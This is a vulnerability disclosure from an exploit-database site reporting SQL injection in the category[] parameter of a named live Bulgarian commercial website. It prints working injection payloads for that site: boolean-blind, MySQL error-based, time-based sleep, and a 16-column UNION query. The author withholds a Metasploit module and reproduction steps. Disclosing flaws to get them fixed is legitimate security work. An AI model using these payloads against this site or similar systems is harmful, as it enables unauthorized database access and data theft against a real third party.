greenlife-Copyright©2025-Multiple-SQLi

2025.10.21
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: greenlife-Copyright©2025-Multiple-SQLi - Metasploit module - soon # Author: nu11secur1ty # Date: 10/06/2025 # Vendor: https://www.greenlife.bg/bg # Software: https://www.greenlife.bg/bg # Reference: https://portswigger.net/web-security/sql-injection ## Description: The category%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads and 7609=07609 and and 2154=2162 were each submitted in the category%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the category%5B%5D parameter. The application took 20206 milliseconds to respond to the request, compared with 1413 milliseconds for the original request, indicating that the injected SQL command caused a time delay. STATUS: HIGH-CRITICAL Vulnerability [+]Payload: - SQLi: ```SQLi --- Parameter: category[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) AND 6069=6069 AND (9510=9510&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) OR (SELECT 6421 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(6421=6421,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (5033=5033&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10 Type: UNION query Title: MySQL UNION query (UCHAR) - 16 columns Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) UNION ALL SELECT 'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x717a626b71,0x765652555971466244766b754c4e6263616e686c4877515a467876567069714c4e43504441625a4b,0x7176717a71),'UCHAR','UCHAR','UCHAR'#&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10 --- ``` [+]MSF exploit: ```rb soon... but not will be published ``` [+]Reproduce: It is not present for security reasons! # Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://nu11secur1ty.blogspot.com/> nu11secur1ty <https://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top